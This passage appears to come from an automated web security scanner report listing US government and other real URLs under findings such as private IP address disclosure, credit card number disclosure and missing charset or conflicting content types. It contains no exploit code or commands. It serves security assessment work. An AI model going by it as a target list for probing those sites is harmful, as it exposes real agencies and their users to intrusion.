20.79. http://www.buzgate.org/8.0/ny/fh.html
20.80. http://www.capehenlopenschools.com/education/district/district.php
20.81. http://www.centerdigitalgov.com/center/highlightstory.phtml
20.82. http://www.colorado.gov/
20.83. http://www.cotrip.org/device.htm
20.84. http://www.dds.ga.gov/drivers/DLdata.aspx
20.85. http://www.delmar.k12.de.us/education/district/district.php
20.86. http://www.denvergov.org/tabid/37889/Default.aspx
20.87. http://www.dol.wa.gov/onlinesvcs.html
20.88. http://www.dol.wa.gov/vehicleregistration/
20.89. http://www.dyve.net/jquery/
20.90. http://www.ed.gov/rschstat/landing.jhtml
20.91. http://www.ehawaii.gov/dakine/index.html
20.92. http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml
20.93. http://www.employment.oregon.gov/EMPLOY/STORIES/online_filing_success.shtml
20.94. http://www.employment.oregon.gov/images/doesNotExist.png
20.95. http://www.facebook.com/TeamHaslam
20.96. http://www.facebook.com/WSDOL
20.97. http://www.facebook.com/note.php
20.98. http://www.facebook.com/ohiodivisionofwatercraft
20.99. http://www.facebook.com/photo.php
20.100. http://www.facebook.com/plugins/like.php
20.101. http://www.facebook.com/share.php
20.102. http://www.georgia.gov/external/
20.103. http://www.georgia.gov/gta/translate/0,2678,4802,00.html
20.104. http://www.georgiawildlife.com/node/1873
20.105. http://www.goccp.maryland.gov/lists/index.php
20.106. http://www.gov.state.la.us/index.cfm
20.107. http://www.in.gov/ai/errors/dwd_404.html
20.108. http://www.in.gov/apps/options/email.aspx
20.109. http://www.in.gov/apps/options/rate.aspx
20.110. http://www.in.gov/apps/options/suggestion.aspx
20.111. http://www.in.gov/core/faqs.html
20.112. http://www.in.gov/dhs/3163.htm
20.113. http://www.in.gov/dnr/6406.htm
20.114. http://www.in.gov/dwd/WorkOne//
20.115. http://www.in.gov/idem/hoosierscare/5601.htm
20.116. http://www.in.gov/isda/2435.htm
20.117. http://www.in.gov/oed/2367.htm
20.118. http://www.in.gov/oed/2572.htm
20.119. http://www.in.gov/pla/license.htm
20.120. http://www.in.gov/recycle/5636.htm
20.121. http://www.inshapeindiana.org/
20.122. http://www.iowa.gov/livehelp.html
20.123. http://www.kansas.gov/index.php
20.124. http://www.kansas.gov/search.php
20.125. http://www.kansas.gov/services/
20.126. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp
20.127. http://www.ksde.org/Default.aspx
20.128. https://www.mcafeesecure.com/RatingVerify
20.129. http://www.mcgi.state.mi.us/milocator/default.aspx
20.130. http://www.mema.state.md.us/MEMA/content_page.jsp
20.131. http://www.michigan.org/Partners/Default.aspx
20.132. http://www.missingkids.com/missingkids/servlet/NewsEventServlet
20.133. http://www.missingkids.com/missingkids/servlet/PageServlet
20.134. http://www.missingkids.com/missingkids/servlet/PubCaseSearchServlet
20.135. http://www.missingkids.com/missingkids/servlet/PublicHomeServlet
20.136. http://www.missingkids.com/missingkids/servlet/StayInformedServlet
20.137. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php
20.138. http://www.molottery.com/winningNumbers.do
20.139. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm
20.140. http://www.myflorida.com/
20.141. http://www.nh.gov/maps/traffic/index.html
20.142. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi
20.143. http://www.nist.gov/srd/onlinelist.htm
20.144. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin
20.145. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
20.146. https://www.nrsservicecenter.com/iApp/ret/landing.do
20.147. https://www.nrsservicecenter.com/iApp/ret/showPage.do
20.148. http://www.nysenate.gov/
20.149. http://www.nysenate.gov/calendar
20.150. http://www.odh.ohio.gov/forms/formfinder.aspx
20.151. http://www.opensource.org/licenses/mit-license.php
20.152. http://www.osc.state.ny.us/
20.153. https://www.paybill.com/Common/Left.asp
20.154. http://www.qualityinfo.org/olmisj/OlmisZine
20.155. http://www.real.com/realplayer
20.156. https://www.scsignon.sc.gov/
20.157. https://www.scsignon.sc.gov/Common/HelpWindow.aspx
20.158. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx
20.159. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx
20.160. https://www.scsignon.sc.gov/Login.aspx
20.161. https://www.scsignon.sc.gov/WebResource.axd
20.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx
20.163. http://www.servicelocator.org/
20.164. http://www.sha.maryland.gov/Index.aspx
20.165. http://www.state.mn.us/portal/mn/jsp/home.do
20.166. http://www.state.nj.us/education/
20.167. http://www.state.nj.us/education/parents/
20.168. https://www.tennesseeanytime.org/biztax/
20.169. https://www.tennesseeanytime.org/paams-app/index.htm
20.170. https://www.tennesseeanytime.org/pmnout/notice/listByMonth
20.171. http://www.thestreet.com/story/11081894/1/netflixs-rising-stock-defies-growing-risks.html
20.172. http://www.tn.gov/bopp/bopp_bo_contents.htm
20.173. http://www.tn.gov/governor/
20.174. http://www.tn.gov/maintenance.html
20.175. http://www.tn.gov/revenue/forms/index.htm
20.176. http://www.tn.gov/revenue/onlinefiling/
20.177. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm
20.178. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm
20.179. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm
20.180. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm
20.181. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm
20.182. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm
20.183. http://www.ulsystem.net/index.cfm
20.184. http://www.utah.gov/governor/news_media/article.html
20.185. http://www.utah.gov/index.html
20.186. http://www.utah.gov/pmn/sitemap/notice/67945.html
20.187. http://www.utah.gov/services/
20.188. http://www.utah.gov/services/business.html
20.189. http://www.utah.gov/services/financial.html
20.190. http://www.utah.gov/services/index.html
20.191. http://www.utah.gov/whatsnew.html
20.192. http://www.visitflorida.com/facebook_logged_in.php
20.193. http://www.visitflorida.com/florida_vacation_auction/auction_details.php
20.194. http://www.visitflorida.com/floridalive
20.195. http://www.vtlmi.info/
20.196. http://www.wor710.com/topic/play_window.php
21.1. http://services.ito.state.il.us/
22.1. http://admin.state.nh.us/hr/js/HM_ScriptDOM.js
22.2. http://admin.state.nh.us/hr/retirement_benefits.html
22.3. http://admin.state.nh.us/wellness/scripts/textsizer.js
22.4. http://ads.adbrite.com/adserver/vdi/711384
22.5. http://agency.governmentjobs.com/tennessee/default.cfm
22.7. http://alaska.gov/quote.html
22.9. http://api.flickr.com/services/feeds/photoset.gne
22.10. https://apps.tn.gov/apps/js/calendar1.js
22.11. https://apps.tn.gov/apps/js/controls.js
22.12. https://apps.tn.gov/apps/js/dragdrop.js
22.13. http://assembly.state.ny.us/
22.14. http://assembly.state.ny.us/leg/
22.15. http://assembly.state.ny.us/mem/
22.16. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp
22.17. http://az.gov/static/portal/js/CalendarPopup.js
22.18. http://blog.nheconomy.com/
22.19. http://ca.gov/images/home/golden_gateway.f4v
22.20. http://cache.pack.google.com/edgedl/chrome/install/696.60_648.205/chrome_updater.exe
22.21. http://cdnb1.kodakgallery.com/A/consolidatedFiles/common_consolidated.min.v-2028399759.js
22.22. http://cityofmuscleshoals.com/Default.asp
22.23. http://climate.rutgers.edu/njwxnet/station.php
22.24. http://courts.delaware.gov/
22.25. http://data.osbm.state.nc.us/pls/pbis/dyn_hr_staffweb.show
22.26. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show
22.27. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libevents.show
22.28. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libforms.show
22.29. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libmemos.show
22.30. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libnews.show
22.31. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libother_one.show
22.32. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libpubs.show
22.33. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libtopicgroups.show
22.34. https://dhr.ky.gov/DHRWeb/RS
22.35. http://dnr.maryland.gov/service/
22.36. http://dola.colorado.gov/dem/index.html
22.37. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.20110427.js
22.38. https://fin.oaks.ohio.gov/psp/FNPRD/
22.39. http://ga.gov/gta/mc/includes/omniture/s_code.js
22.40. https://georgiawildlife.dnr.state.ga.us/service/login1.asp
22.41. https://hcm.oaks.ohio.gov/psp/HCPRD/
22.42. http://home.mcafee.com/Root/AboutUs.aspx
22.43. https://home.mcafee.com/Scripts/instant_invite/ProActiveChatSmartButton.js
22.44. http://housing.utah.gov/news/
22.46. http://ia.gov/js/jq-cookies.js
22.47. http://idaho.gov/appskins/idahogov200902/javascript/equalcolumns.js
22.48. http://in.gov/core/js/agency.js
22.49. http://in.gov/core/js/jquery.slideshow.js
22.50. http://in.gov/core/js/jquery.swapimage.min.js
22.51. http://in.gov/core/js/portal_scripts.js
22.52. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm
22.53. http://johncarney.house.gov/
22.54. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement
22.55. http://johncarney.house.gov/profiles/house/themes/house/js/jquery-validation-engine.js
22.56. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js
22.57. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js
22.58. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js
22.60. http://la.gov/Government/Boards_and_Commissions/
22.61. http://legis.state.la.us/contact.htm
22.62. http://legis.state.la.us/main.asp
22.63. http://licensingexpress.wordpress.com/
22.64. http://maps.google.com/maps/gx
22.65. http://maps.google.com/maps/gx
22.66. http://maps.google.com/maps/gx
22.67. http://maps.google.com/maps/gx
22.68. http://maps.google.com/maps/sf
22.69. http://maps.google.com/maps/sf
22.70. http://maps.google.com/maps/sf
22.71. http://maps.google.com/maps/sf
22.72. http://mi.gov/js/jquery.cross-slide.min.0.6.2.js
22.73. http://mi.gov/js/jquery.cross-slide.min.js
22.74. http://mibid.bidcorp.com/ActiveAuctions.aspx
22.75. http://mibid.bidcorp.com/AuctionDetails.aspx
22.76. http://mibid.bidcorp.com/EndingAuctions.aspx
22.77. https://mibid.bidcorp.com/Login.aspx
22.78. http://nc.gov/1222,1222,Online_Services,Online_Services.html
22.79. http://nc.gov/directory.aspx
22.80. http://ncchildcaresearch.dhhs.state.nc.us/search.asp
22.82. https://nhlicenses.nh.gov/MyLicense%20Enterprise/
22.83. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl
22.84. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl
22.85. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl
22.86. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl
22.87. https://nhlicenses2.nh.gov/professional/
22.88. http://nv.gov/GovPR.aspx
22.89. http://nv.gov/WorkArea/java/ektron.js
22.90. http://nv.gov/ext/adapter/ext/ext-base.js
22.91. http://nv.gov/ext/ext-all.js
22.92. http://nv.gov/ext/resources/css/ext-all.css
22.93. http://nv.gov/ext/resources/css/xtheme-blue.css
22.94. http://ohiodnr.com/controls/SolpartMenu/spmenu.js
22.95. http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx
22.96. http://ohiodnr.com/watercraft/RegistrationandTitling/tabid/2774/Default.aspx
22.97. http://phonebook.iowa.gov/agency.aspx
22.98. http://phonebook.iowa.gov/info.aspx
22.99. http://phonebook.iowa.gov/js/jq-cookies.js
22.100. http://sc.gov/Style%20Library/scripts/jquery.cookie.js
22.101. http://serverapi.arcgisonline.com/jsapi/arcgis/
22.102. http://sos.ri.gov/business/
22.103. http://sos.ri.gov/business/apostilles/
22.104. http://sos.ri.gov/openmeetings/
22.105. http://stayconnected.hawaii.gov/
22.107. http://tn.gov/apps/js/controls.js
22.108. http://tn.gov/apps/js/dragdrop.js
22.109. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm
22.110. https://treas-secure.treas.state.mi.us/eservice_enu/19230/scripts/swecommon.js
22.111. https://txapps.texas.gov/tolapp/viewandpay
22.112. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do
22.113. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do
22.114. http://www.511ia.org/default.asp
22.115. http://www.adfg.alaska.gov/index.cfm
22.117. https://www.alabamainteractive.org/abc_license/
22.118. https://www.alabamainteractive.org/arecmenu/welcome.action
22.119. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js
22.120. http://www.archives.gov/veterans/military-service-records/
22.121. https://www.bbb.org/online/consumer/cks.aspx
22.122. http://www.bea.gov/bea/regional/reis/default.cfm
22.123. http://www.blogs.va.gov/VAntage/
22.125. http://www.colorado.gov/apps/epostcard/servlet/begin
22.126. http://www.colorado.gov/apps/feedback/servlet/begin
22.129. http://www.ct.gov/ctportal/cwp/view.asp
22.130. http://www.ct.gov/ctportal/site/default.asp
22.131. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp
22.132. http://www.delmar.k12.de.us/education/district/district.php
22.133. http://www.dhh.louisiana.gov/links.asp
22.134. http://www.dhh.louisiana.gov/offices/page.asp
22.135. http://www.dhss.delaware.gov/dhss/stylesheets/print.css
22.136. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
22.139. http://www.dms.myflorida.com/design/dev/javascript/jquery.dataTables.js
22.140. http://www.dms.myflorida.com/design/dev/javascript/prototype.js
22.143. http://www.dms.myflorida.com/mfmp
22.144. http://www.doc.louisiana.gov/view.php
22.145. http://www.doc.state.nc.us/clemency/
22.146. http://www.dol.wa.gov/driverslicense/guide.html
22.147. http://www.doleta.gov/disability/new_dpn_grants.cfm
22.148. http://www.dyve.net/jquery/
22.149. http://www.epa.ohio.gov/Default.aspx
22.150. http://www.georgiawildlife.com/
22.151. http://www.governmentjobs.com//js/wddx.js
22.152. http://www.governor.ny.gov/
22.153. http://www.governor.ny.gov/js/js_6bd6cece2835e62cf45d64d29e58747f.js
22.154. http://www.healthynh.com/inc/menusNeue.phpi
22.155. http://www.healthynh.com/index-fhc.php
22.156. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx
22.157. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm
22.158. http://www.in.gov/dnr/6406.htm
22.159. http://www.in.gov/portal/global/javascript/9.js
22.160. http://www.inshapeindiana.org/
22.161. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp
22.162. http://www.ksde.org/Default.aspx
22.163. http://www.mcgi.state.mi.us/milocator/default.aspx
22.164. http://www.mema.state.md.us/MEMA/content_page.jsp
22.165. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php
22.166. http://www.mo.gov/wp-content/themes/Mo.gov/js/compiled/compiled-js.php
22.167. http://www.nh.gov/accountancy/
22.168. http://www.nh.gov/dot/nhrideshare/
22.169. http://www.nh.gov/scripts/textsizer.js
22.170. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi
22.171. http://www.nist.gov/search-results.cfm
22.172. http://www.nist.gov/srd/onlinelist.htm
22.173. http://www.nmcpr.state.nm.us/nmac/
22.174. http://www.nv.gov/NV_default4.aspx
22.175. http://www.nv.gov/WorkArea/java/ektron.js
22.176. http://www.nv.gov/ext/adapter/ext/ext-base.js
22.177. http://www.nv.gov/ext/ext-all.js
22.178. http://www.nv.gov/ext/resources/css/ext-all.css
22.179. http://www.nv.gov/ext/resources/css/xtheme-blue.css
22.180. http://www.nyfirst.ny.gov/
22.181. http://www.nysenate.gov/files/js/js_62120c49af6ee45b927235f2cfb845ee.js
22.182. http://www.obout.com/t2/ht_howto.aspx
22.183. http://www.ode.state.or.us/search/results/
22.184. http://www.opensource.org/licenses/mit-license.php
22.185. http://www.osbm.state.nc.us/js/helperplugin.js
22.186. http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm
22.187. https://www.paybill.com/payccu/
22.188. http://www.ri.gov/js/fontsizer.js
22.189. http://www.ri.gov/js/jquery.cdc.ticker.js
22.190. http://www.ri.gov/js/jquery_cookie.js
22.191. http://www.ri.gov/plugins/mozilla_search.xml
22.192. http://www.servicelocator.org/
22.193. http://www.sha.maryland.gov/Index.aspx
22.194. http://www.sos.idaho.gov/elect/eleindex.htm
22.195. http://www.sos.idaho.gov/elect/results.htm
22.196. http://www.state.sd.us/calendar/index.cfm
22.197. https://www.tennesseeanytime.org/apps/js/controls.js
22.198. https://www.tennesseeanytime.org/apps/js/dragdrop.js
22.199. https://www.tennesseeanytime.org/apps/js/prototype.lite.js
22.200. https://www.tennesseeanytime.org/biztax/
22.201. https://www.tennesseeanytime.org/pmnout/notice/listByMonth
22.202. http://www.texas.gov/en/Pages/default.aspx
22.203. http://www.tn.gov/apps/js/controls.js
22.204. http://www.tn.gov/apps/js/dragdrop.js
22.205. http://www.tn.gov/bopp/bopp_bo_contents.htm
22.206. http://www.tn.gov/governor/
22.207. http://www.tn.gov/maintenance.html
22.208. http://www.tn.gov/revenue/forms/index.htm
22.209. http://www.tn.gov/revenue/onlinefiling/
22.210. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm
22.211. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm
22.212. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm
22.213. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm
22.214. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm
22.215. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm
22.216. http://www.treasury.louisiana.gov/Home%20Pages/BondCommission.aspx
22.217. http://www.utah.gov/governor/news_media/article.html
22.218. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js
22.219. http://www.utah.gov/js/jquery.scrollable.min.js
22.220. http://www.utah.gov/pmn/sitemap/notice/67945.html
22.221. https://www.vermontjoblink.com/ada
22.222. https://www.vermontjoblink.com/ada/
22.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm
22.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm
22.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm
22.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico
22.227. https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif
22.228. https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg
22.229. https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png
22.230. https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif
22.231. https://www.vermontjoblink.com/ada/default.cfm
22.232. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm
22.233. https://www.vermontjoblink.com/ada/global/images/1p.gif
22.234. https://www.vermontjoblink.com/ada/global/images/error.gif
22.235. https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif
22.236. https://www.vermontjoblink.com/ada/global/images/printericonA.png
22.237. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js
22.238. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js
22.239. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js
22.240. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css
22.241. https://www.vermontjoblink.com/ada/leavesite.cfm
22.242. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm
22.243. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
22.244. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm
22.245. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm
22.246. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm
22.247. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm
22.248. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
22.249. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm
22.250. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm
22.251. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm
22.252. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm
22.253. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm
22.254. https://www.vermontjoblink.com/ada/works/FAQ.cfm
22.255. https://www.vermontjoblink.com/ada/works/Login.cfm
22.256. https://www.vermontjoblink.com/ada/works/contactus.cfm
22.257. https://www.vermontjoblink.com/ada/works/employeroverview.cfm
22.258. https://www.vermontjoblink.com/ada/works/joboverview.cfm
22.259. https://www.vermontjoblink.com/ada/works/jobsearch.cfm
22.260. https://www.vermontjoblink.com/ada/works/linkview.cfm
22.261. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm
22.262. https://www.vermontjoblink.com/favicon.ico
22.263. http://www.vsea.org/join-your-union
23. Private IP addresses disclosed
23.2. http://facebook.com/sharer.php
23.4. http://home.mcafee.com/AdviceCenter/Default.aspx
23.5. http://home.mcafee.com/Default.aspx
23.6. http://home.mcafee.com/Default.aspx
23.8. http://www.archives.gov/shop/
23.9. http://www.archives.gov/veterans/evetrecs/index.html
23.10. http://www.archives.gov/veterans/military-service-records/
23.11. http://www.facebook.com/TeamHaslam
23.12. http://www.facebook.com/WSDOL
23.13. http://www.facebook.com/campaign/landing.php
23.14. http://www.facebook.com/note.php
23.15. http://www.facebook.com/ohiodivisionofwatercraft
23.16. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845
23.17. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387
23.19. http://www.facebook.com/photo.php
23.20. http://www.facebook.com/plugins/like.php
23.21. http://www.facebook.com/plugins/like.php
23.22. http://www.facebook.com/share.php
23.23. http://www.facebook.com/video/video.php
23.24. http://www.google.com/sdch/rU20-FBA.dct
23.25. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx
23.26. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal
23.27. http://www.ncesc.com/lmi/default.asp
24. Credit card numbers disclosed
24.1. http://data.ok.gov/views/INLINE/rows.json
24.2. http://maps.google.com/maps/sf
25.1. http://in.gov/core/js/arss.css
25.3. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif
25.4. http://www.governor.nh.gov/
26.1. https://app.mobilestorm.com/cp/manageforms/preview.php
26.2. https://apps.tn.gov/biztax-app/login.html
26.3. https://apps.tn.gov/biztax/
26.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
26.5. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf
26.6. https://bugzilla.mozilla.org/show_bug.cgi
26.7. https://dotax.ehawaii.gov/efile/css/stylesheet.css
26.8. https://dotax.ehawaii.gov/efile/user
26.9. https://dotax.ehawaii.gov/favicon.ico
26.10. https://fortress.wa.gov/dol/dolprod/dsdoffices/
26.11. https://fortress.wa.gov/dol/dolprod/vehoffices/
26.12. https://geonic.cdc.nicusa.com/geoserver/wms
26.13. https://georgiawildlife.dnr.state.ga.us/service/login1.asp
26.14. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm
26.15. https://license.ohio.gov/lookup/default.asp
26.16. https://maps-api-ssl.google.com/maps
26.17. https://mibid.bidcorp.com/Login.aspx
26.18. https://myalaska.state.ak.us/
26.19. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl
26.20. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl
26.21. https://nhlicenses2.nh.gov/favicon.ico
26.22. https://nhlicenses2.nh.gov/professional/
26.23. https://onestop.michigan.gov/favicon.ico
26.24. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png
26.25. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png
26.26. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
26.27. https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet
26.28. https://seal.verisign.com/getseal
26.29. https://secure.kentucky.gov/portal/login.aspx
26.30. https://secure.missingkids.com/missingkids/servlet/CybertipServlet
26.31. https://secure.utah.gov/rex/
26.32. https://secure.utah.gov/rex/index.html
26.33. https://treas-secure.treas.state.mi.us/eservice_enu/
26.34. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe
26.35. https://web.globalpay.com/taxpayer/default.asp
26.36. https://www.accesskansas.org/businesscenter/index.html
26.37. https://www.accesskansas.org/dissolutions/index.do
26.38. https://www.accesskansas.org/favicon.ico
26.39. https://www.alabamainteractive.org/abc_license/
26.40. https://www.alabamainteractive.org/abc_license/content/common/styleSheet.jsp
26.41. https://www.bbb.org/online/consumer/cks.aspx
26.42. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf
26.43. https://www.compasssmartshopper.com/WebResource.axd
26.44. https://www.compasssmartshopper.com/default.aspx
26.45. https://www.compasssmartshopper.com/passwordrecovery.aspx
26.46. https://www.ehawaii.gov/efile/
26.47. https://www.ehawaii.gov/efile/js/jquery-1.2.6.min.js
26.48. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc
26.49. https://www.insightexpressai.com/adServer/adServer.aspx
26.50. https://www.ncourt.com/forms/DE/navigation.aspx
26.51. https://www.tennesseeanytime.org/biztax/
26.52. https://www.tennesseeanytime.org/favicon.ico
26.53. https://www.tennesseeanytime.org/includes/alert/alert.shtml
26.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth
26.55. https://www.vermontjoblink.com/ada/404/404_qry.cfm
26.56. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm
26.57. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm
26.58. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css
26.59. https://www.vermontjoblink.com/ada/leavesite.cfm
26.60. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm
26.61. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
26.62. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm
26.63. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm
26.64. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm
26.65. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm
26.66. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm
26.67. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm
26.68. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm
26.69. https://www.vermontjoblink.com/ada/works/FAQ.cfm
26.70. https://www.vermontjoblink.com/ada/works/Login.cfm
26.71. https://www.vermontjoblink.com/ada/works/contactus.cfm
26.72. https://www.vermontjoblink.com/ada/works/employeroverview.cfm
26.73. https://www.vermontjoblink.com/ada/works/joboverview.cfm
26.74. https://www.vermontjoblink.com/ada/works/jobsearch.cfm
26.75. https://www.vermontjoblink.com/ada/works/linkview.cfm
26.76. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm
26.77. https://www.vitalchek.com/AjaxFAQServer.aspx
26.78. https://www.vitalchek.com/AjaxOrderStepServer.aspx
26.79. https://www.vitalchek.com/order_step_js.aspx
27. Multiple content types specified
27.1. http://data.ok.gov/packages/shared-table-editor.js
27.2. http://phonebook.iowa.gov/scripts/tiny_mce/tiny_mce.js
28. HTML does not specify charset
28.1. http://admin.state.nh.us/hr/
28.2. http://admin.state.nh.us/hr/retirement_benefits.html
28.4. http://business.ohio.gov/inc/print.css
28.5. http://cityofmuscleshoals.com/Default.asp
28.6. http://data.gosquared.com/favicon.ico
28.7. http://emergency.louisiana.gov/
28.8. http://fls.doubleclick.net/activityi
28.9. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5
28.10. http://in.gov/core/index_pages/quicklinks.html
28.11. http://jqueryui.com/themeroller/
28.13. http://la.gov/phpincludes/weathergraphic.php
28.14. http://legis.delaware.gov/Lookup/ContactInfo_Home
28.15. http://legis.delaware.gov/Lookup/Divisions_Home
28.16. http://legis.delaware.gov/Lookup/GeneralInfo_Home
28.17. http://legis.delaware.gov/Lookup/House_Home
28.18. http://legis.delaware.gov/Lookup/Meetings_Home
28.19. http://legis.delaware.gov/Lookup/OnlinePub_Home
28.20. http://legis.delaware.gov/Lookup/SenateHome
28.21. http://legis.delaware.gov/Lookup/copyright
28.22. http://legis.delaware.gov/Lookup/disclaimer
28.23. http://legis.delaware.gov/Lookup/faq
28.24. http://legis.delaware.gov/Lookup/permissions
28.25. http://legis.delaware.gov/images/spacer.gif
28.26. http://legis.state.la.us/
28.27. http://legis.state.la.us/contact.htm
28.28. http://legis.state.la.us/index.htm
28.29. http://legis.state.la.us/main.asp
28.30. https://license.ohio.gov/lookup/default.asp
28.32. http://mi.gov/unemployment
28.33. https://myalaska.state.ak.us/
28.34. http://ncchildcaresearch.dhhs.state.nc.us/search.asp
28.36. https://onestop.michigan.gov/OneStop/a
28.37. https://onestop.michigan.gov/css/none
28.38. https://onestop.michigan.gov/images/imgBanBG.gif
28.39. https://onestop.michigan.gov/onestop-main/OneStop/a
28.40. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do
28.41. http://orangoo.com/AmiNation/AJS
28.43. https://portal.s4web.state.mn.us/favicon.ico
28.44. http://public.leginfo.state.ny.us/menugetf.cgi
28.45. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm
